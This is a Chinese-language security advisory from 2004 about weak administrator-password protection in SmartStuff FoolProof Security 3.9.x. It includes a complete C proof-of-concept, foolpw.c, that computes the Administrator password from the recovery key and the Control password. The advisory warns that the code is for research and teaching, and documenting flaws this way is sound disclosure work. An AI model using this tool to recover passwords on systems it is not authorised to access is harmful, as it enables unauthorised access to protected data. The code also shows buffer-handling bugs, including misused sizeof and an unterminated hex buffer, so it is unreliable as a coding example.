安全研究

安全漏洞
SmartStuff FoolProof Security Program管理密码恢复漏洞

发布日期:2004-06-05
更新日期:2004-06-09

受影响系统:
SmartStuff FoolProof Security 3.9.7
SmartStuff FoolProof Security 3.9.4
不受影响系统:
SmartStuff FoolProof Security 5.0
SmartStuff FoolProof Security 4.0.2
描述:
BUGTRAQ  ID: 10467

FoolProof是Smartstuff公司的一个安全程序,它可为Windows和MAC提供访问控制,它可以保护系统文件和文件夹。

FoolProof管理密码加密机制不够强壮,攻击者可以利用这个漏洞恢复应用程序的管理密码信息。

攻击者可以更改密码恢复机制来获得'Administrator'密码信息,从而控制应用程序,访问受保护数据。

<*来源:Cyrillium Security
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cyrillium Security 提供了如下测试方法:

/*    The following program calculates the "Administrator" password from the
    password recovery key and the "Control" password.
    
    Usage:
        
        Invoke the program with the following arguments:

        foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD

        Example:

        C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
        12345
    
    Source code:
*/
/*

foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.

Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.

CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int i; /* Index variable */
    char a, /* Temporary variable for calculations */
         k[33], /* Recovery key in hexadecimal */
         k_array[17], /* Recovery key as array */
         c[17], /* Control password */
         *b = "D:SKFOIJ(*EHJFL", /* Offsets */
         hex_temp[2], /* Temporary storage for hexadecimal conversion */
         *endptr; /* Output variable for strtoul */

    if (argc != 3)
    {
        puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
        return 1;
    }
    if (strlen (argv[1]) != 16*2)
    {
        puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
        return 1;
    }
    if (strlen (argv[2]) > 16)
    {
        puts ("Passwords are limited to 16 characters");
        return 1;
    }
    memset (k, 0, sizeof (b));
    memset (k_array, 0, sizeof (b));
    memset (c, 0, sizeof (c));
    memset (hex_temp, 0, sizeof (hex_temp));
    strcpy (k, argv[1]);
    strcpy (c, argv[2]);

    for (i = 0; i < 16; i++)
    {
        memcpy (hex_temp, &k[i*2], 2);
        k_array[i] = strtoul (hex_temp, &endptr, 16);
        if (*endptr != '\0')
        {
            printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
            return 1;
        }
        a = (c[i] + b[i]) ^ k_array[i];
        putc (a, stdout);
    }
    puts ("");
    return 0;
}

建议:
厂商补丁:

SmartStuff
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.smartstuff.com/fps/fpsinfo.html

浏览次数:2942
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障